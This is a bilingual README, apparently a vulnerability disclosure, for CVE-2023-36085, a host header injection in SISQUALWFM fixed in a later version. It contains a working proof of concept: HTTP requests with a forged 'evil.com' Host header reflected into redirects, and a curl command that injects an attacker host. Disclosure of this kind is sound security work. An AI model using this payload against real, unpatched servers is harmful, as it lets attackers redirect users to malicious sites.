
This repository contains information related CVE-2023-36085 a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.
Ce dépôt contient des informations relatives à une vulnérabilité d'injection d'en-tête d'hôte découverte dans SISQUALWFM version 7.1.319.103, qui permet à un attaquant de manipuler les liens de pages web ou de rediriger les utilisateurs vers un site malveillant. Cette vulnérabilité a reçu l'identifiant CVE-2023-36085 et a été corrigée dans la version 7.1.319.111 et ultérieures.
Nous fournissons un scénario de preuve de concept démontrant la vulnérabilité d'injection d'en-tête d'hôte, ciblant spécifiquement le point de terminaison /sisqualIdentityServer/core. Cette vulnérabilité permet à un attaquant de manipuler les liens de pages web ou de rediriger les utilisateurs vers un autre site en altérant l'en-tête d'hôte.
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Pour exploiter cette vulnérabilité, un attaquant peut utiliser la commande curl suivante pour modifier l'en-tête d'hôte :
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
Ce dépôt est fourni à titre d'information uniquement et ne doit pas être utilisé pour des activités malveillantes. La vulnérabilité a été divulguée de manière responsable au fournisseur, et le problème a été résolu. Il est essentiel de suivre les directives de piratage éthique et de respecter les pratiques de divulgation responsable lors de l'identification et du signalement des vulnérabilités.